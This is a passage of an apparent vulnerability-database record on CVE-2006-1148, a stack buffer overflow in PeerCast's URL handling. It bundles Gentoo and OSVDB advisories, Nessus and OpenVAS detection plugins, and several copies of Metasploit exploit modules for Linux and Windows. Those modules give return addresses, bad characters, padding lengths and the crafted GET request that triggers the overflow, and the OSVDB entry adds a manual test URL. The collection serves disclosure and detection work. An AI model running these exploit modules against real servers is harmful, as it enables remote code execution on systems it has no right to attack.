v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'MC' ],\n 'License' => BSD_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 200,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'MinNops' => 64,\n },\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Targets' =>\n [\n ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options([\n Opt::RPORT(7144)\n ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(780)\n pat << [target.ret].pack('V')\n pat << payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/peercast_url.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:48", "references": [], "edition": 1, "description": "", "reporter": "MC", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "PeerCast 0.1216 Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1148"], "modified": "2009-10-27T00:00:00", "href": "https://packetstormsecurity.com/files/82238/PeerCast-0.1216-Buffer-Overflow.html", "id": "PACKETSTORM:82238", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)', \n'Description' => %q{ \nThis module exploits a stack overflow in PeerCast <= v0.1216. \nThe vulnerability is caused due to a boundary error within the \nhandling of URL parameters. \n \n}, \n'Author' => [ 'MC' ], \n'License' => BSD_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-1148'], \n['OSVDB', '23777'], \n['BID', '17040'], \n['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 200, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\", \n'MinNops' => 64, \n}, \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }], \n], \n'DisclosureDate' => 'Mar 8 2006')) \n \nregister_options( [ Opt::RPORT(7144) ], self.class ) \nend \n \ndef exploit \nconnect \n \npat = rand_text_alphanumeric(780) \npat << [target.ret].pack('V') \npat << payload.encoded \n \nuri = '/stream/?' + pat \n \nres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\" \n \nprint_status(\"Trying target address 0x%.8x...\" % target.ret) \nsock.put(res) \n \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82238/peercast_url.rb.txt"}], "gentoo": [{"lastseen": "2016-09-06T19:46:33", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-1148", "https://bugs.gentoo.org/show_bug.cgi?id=123432"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "0.1217", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "media-sound/peercast", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPeerCast is a Peer to Peer broadcasting technology for listening to radio and watching video on the Internet. \n\n### Description\n\nINFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function. \n\n### Impact\n\nBy sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PeerCast users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/peercast-0.1217\"", "reporter": "Gentoo Foundation", "published": "2006-03-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "PeerCast: Buffer overflow", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1148"], "modified": "2006-03-21T00:00:00", "id": "GLSA-200603-17", "href": "https://security.gentoo.org/glsa/200603-17", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:50:00", "references": ["http://www.nessus.org/u?ed1ade41", "http://www.securityfocus.com/archive/1/427160/30/0/threaded"], "pluginID": "21041", "description": "The version of PeerCast installed on the remote host copies the supplied option string without limit into a finite-size buffer. An unauthenticated attacker can leverage this issue to crash the affected application and possibly to execute arbitrary code on the remote host subject to the privileges of the user running PeerCast.", "edition": 5, "reporter": "Tenable", "published": "2006-03-10T00:00:00", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Peer-To-Peer File Sharing", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1148"], "modified": "2018-07-24T00:00:00", "cpe": [], "id": "PEERCAST_01217.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21041", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(21041);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2006-1148\");\n script_bugtraq_id(17040);\n\n script_name(english:\"PeerCast procConnectArgs() Function URL Handling Remote Overflow\");\n script_summary(english:\"Checks version of PeerCast web server\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server suffers from a buffer overflow vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of PeerCast installed on the remote host copies the\nsupplied option string without limit into a finite-size buffer. An\nunauthenticated attacker can leverage this issue to crash the affected\napplication and possibly to execute arbitrary code on the remote host\nsubject to the privileges of the user running PeerCast.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/427160/30/0/threaded\" );\n # http://web.archive.org/web/20070713004957/http://www.peercast.org/forum/viewtopic.php?t=3346\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed1ade41\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PeerCast version 0.1217 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PeerCast URL Handling Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/03/09\");\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"peercast_installed.nasl\");\n script_require_keys(\"PeerCast/installed\");\n script_require_ports(\"Services/www\", 7144);\n\n exit(0);\n}\n\n\nif (!get_kb_item(\"PeerCast/installed\")) exit(0);\n\ninclude(\"global_settings.inc\");\n\nlist = get_kb_list(\"PeerCast/*/version\");\nif (isnull(list)) exit(0);\n\nforeach key (keys(list))\n{\n port = key - \"PeerCast/\" - \"/version\";\n ver = list[key];\n\n if (get_port_state(port))\n {\n # Check the version.\n vuln = FALSE;\n\n if (ver =~ \"^[0-9]\\.[0-9]+$\")\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (iver[0] == 0 && iver[1] < 1218) vuln = TRUE;\n }\n else if (report_paranoia > 1) vuln = TRUE;\n\n if (vuln)\n {\n report = string(\n \"According to its Server response header, the version of PeerCast on the\\n\",\n \"remote host is :\\n\",\n \"\\n\",\n \" \", ver, \"\\n\"\n );\n security_hole(port:port, extra:report);\n break;\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:39:27", "references": ["https://security.gentoo.org/glsa/200603-17"], "pluginID": "21124", "description": "The remote host is affected by the vulnerability described in GLSA-200603-17 (PeerCast: Buffer overflow)\n\n INFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function.\n Impact :\n\n By sending a specially crafted request to the HTTP server, a remote attacker can cause a stack overflow, resulting in the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "reporter": "Tenable", "published": "2006-03-23T00:00:00", "title": "GLSA-200603-17 : PeerCast: Buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1148"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:peercast"], "id": "GENTOO_GLSA-200603-17.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21124", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200603-17.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21124);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2006-1148\");\n script_xref(name:\"GLSA\", value:\"200603-17\");\n\n script_name(english:\"GLSA-200603-17 : PeerCast: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200603-17\n(PeerCast: Buffer overflow)\n\n INFIGO discovered a problem in the URL handling code. Buffers that\n are allocated on the stack can be overflowed inside of nextCGIarg()\n function.\n \nImpact :\n\n By sending a specially crafted request to the HTTP server, a\n remote attacker can cause a stack overflow, resulting in the execution\n of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200603-17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PeerCast users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/peercast-0.1217'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PeerCast URL Handling Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:peercast\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/peercast\", unaffected:make_list(\"ge 0.1217\"), vulnerable:make_list(\"lt 0.1217\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PeerCast\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "references": [], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[target]:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)\n## References:\nVendor URL: http://www.peercast.org/\n[Secunia Advisory ID:19169](https://secuniaresearch.flexerasoftware.com/advisories/19169/)\n[Secunia Advisory ID:19291](https://secuniaresearch.flexerasoftware.com/advisories/19291/)\nOther Advisory URL: http://www.peercast.org/forum/viewtopic.php?t=3346\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200603-17.xml\nOther Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0977.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0722.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c\n[CVE-2006-1148](https://vulners.com/cve/CVE-2006-1148)\nBugtraq ID: 17040\n", "reporter": "Leon Juranic(leon.juranic@infigo.hr)", "published": "2006-03-09T06:02:41", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PeerCast", "version": "0.1215", "operator": "eq"}], "cvelist": ["CVE-2006-1148"], "modified": "2006-03-09T06:02:41", "href": "https://vulners.com/osvdb/OSVDB:23777", "id": "OSVDB:23777", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:40:34", "osvdbidlist": ["23777"], "references": [], "edition": 1, "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "reporter": "metasploit", "published": "2010-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow linux", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1148"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16855", "href": "https://www.exploit-db.com/exploits/16855/", "sourceData": "##\r\n# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in PeerCast <= v0.1216.\r\n\t\t\t\tThe vulnerability is caused due to a boundary error within the\r\n\t\t\t\thandling of URL parameters.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-1148'],\r\n\t\t\t\t\t['OSVDB', '23777'],\r\n\t\t\t\t\t['BID', '17040'],\r\n\t\t\t\t\t['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\r\n\t\t\t\t\t'MinNops' => 64,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 8 2006'))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(7144)\r\n\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tpat = rand_text_alphanumeric(780)\r\n\t\tpat << [target.ret].pack('V')\r\n\t\tpat << payload.encoded\r\n\r\n\t\turi = '/stream/?' + pat\r\n\r\n\t\tres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target.ret)\r\n\t\tsock.put(res)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16855/"}, {"lastseen": "2016-02-02T06:30:19", "osvdbidlist": ["23777"], "references": [], "edition": 1, "description": "PeerCast. CVE-2006-1148. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow Win32", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1148"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16786", "href": "https://www.exploit-db.com/exploits/16786/", "sourceData": "##\r\n# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in PeerCast <= v0.1216.\r\n\t\t\t\tThe vulnerability is caused due to a boundary error within the\r\n\t\t\t\thandling of URL parameters.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-1148'],\r\n\t\t\t\t\t['OSVDB', '23777'],\r\n\t\t\t\t\t['BID', '17040'],\r\n\t\t\t\t\t['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\r\n\t\t\t\t\t['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\r\n\t\t\t\t\t['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\r\n\t\t\t\t\t['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 8 2006'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(7144) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tpat = rand_text_alphanumeric(1024)\r\n\t\tpat[768, 4] = [target.ret].pack('V')\r\n\t\tpat[812, 5] = [0xe9, -517].pack('CV')\r\n\t\tpat[300, payload.encoded.length] = payload.encoded\r\n\r\n\t\turi = '/stream/?' + pat\r\n\r\n\t\tres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target.ret)\r\n\t\tsock.put(res)\r\n\t\tsock.close\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16786/"}, {"lastseen": "2016-02-01T11:45:48", "osvdbidlist": ["23777"], "references": [], "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "edition": 1, "reporter": "MC", "published": "2006-03-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "PeerCast <= 0.1216", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1148"], "modified": "2006-03-08T00:00:00", "id": "EDB-ID:10027", "href": "https://www.exploit-db.com/exploits/10027/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack overflow in PeerCast <= v0.1216. \r\n\t\t\t\tThe vulnerability is caused due to a boundary error within the\r\n\t\t\t\thandling of URL parameters.\r\n\t\t\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-1148'],\r\n\t \t\t\t\t['OSVDB', '23777'],\r\n\t\t\t\t\t['BID', '17040'],\r\n\t\t\t\t\t['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\r\n\t\t\t\t\t'MinNops' => 64,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 8 2006'))\r\n\t\t\t\r\n\t\t\tregister_options( [ Opt::RPORT(7144) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\r\n\t\tpat = rand_text_alphanumeric(780)\r\n\t\tpat << [target.ret].pack('V')\r\n\t\tpat << payload.encoded\r\n\r\n\t\turi = '/stream/?' + pat\r\n\t\t\r\n\t\tres = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\r\n\t\t\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target.ret)\r\n\t\tsock.put(res)\r\n\t\t\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10027/"}], "openvas": [{"lastseen": "2017-07-24T12:50:17", "references": [], "pluginID": "56545", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-17.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200603-17 (peercast)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1148"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56545", "id": "OPENVAS:56545", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PeerCast is vulnerable to a buffer overflow that may lead to the execution\nof arbitrary code.\";\ntag_solution = \"All PeerCast users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/peercast-0.1217'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200603-17\nhttp://bugs.gentoo.org/show_bug.cgi?id=123432\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200603-17.\";\n\n \n\nif(description)\n{\n script_id(56545);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-1148\", \"CVE-2006-1148\");\n script_tag(name:\"cvss_base\", 